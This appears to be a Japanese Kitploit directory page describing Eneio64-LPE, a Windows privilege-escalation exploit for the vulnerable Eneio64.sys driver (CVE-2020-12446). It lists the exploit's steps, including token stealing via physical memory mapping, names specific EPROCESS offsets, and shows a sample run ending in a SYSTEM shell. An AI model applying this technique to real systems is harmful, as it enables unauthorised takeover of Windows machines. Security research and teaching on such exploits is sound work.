Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Eneio64-LPE — CVE-2020-12446 Eneio64.sys のエクスプロイトです。アドレス変換に superfetch を使用します。 | Kitploit
ツール/GitHubGitHub/s1lkys/eneio64-lpe
特権昇格エクスプロイト学習と教育バイナリエクスプロイト
GitHubs1lkys/eneio64-lpe

Eneio64-LPE

CVE-2020-12446 Eneio64.sys のエクスプロイトです。アドレス変換に superfetch を使用します。

リポジトリを見る
3127ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
  1. 脆弱なドライバへのハンドルを開く
  2. 物理メモリをユーザースペースにマッピングする
  3. Systemプロセスへのハンドルを開く
  4. 現在のプロセスのSystemHandleInformationテーブルを照会し、取得したシステムハンドルからそのEPROCESSアドレスをリークする
  5. System EPROCESSのActiveProcessLinks flinkを、現在のプロセスのPIDが見つかるまで辿る
  6. 現在のプロセスのトークンをSystemプロセスのトークンでパッチする
  7. 新しいPowerShellプロセスを起動する

CR3の漏洩やページテーブルの走査の代わりに、virtual2physicalアドレス変換にsuperfetchメソッドを使用する。

Win11 21H2でテスト済み

C:\Users\Public>.\Eneio64-LPE.exe
[+] Total physical memory: ~0x7fef2000 bytes
[+] Mapped physical memory at 000002A3A4FC0000
[+] Leaking System EPROCESS
[+] Opened handle to SYSTEM process (PID 4)
>    Current PID:  3932
>    Handle value: 0x5c
[+] Querying SystemHandleInformation table of current process
[+] Handle table queried successfully
>    Buffer size:    1048576 bytes
>    Resize rounds:  15
>    Total handles:  29211
[+] Searching for handle 0x5c in handle table
[+] Match found at index 29183 / 29211
>    PID:                      3932
>    Handle:                   0x5c
>    Object (System EPROCESS): 0xffff858ca1885040
[+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID
[+] Next Flink addr - 0x448 = Next EPROCESS
[+] Found current process (PID 3932) token at [0x72cd25f8]
[+] Patching current token with SYSTEM token
[!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ====
[+] Token replaced.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public>whoami
nt authority\system

教育目的のみで使用してください!

ツールをダウンロード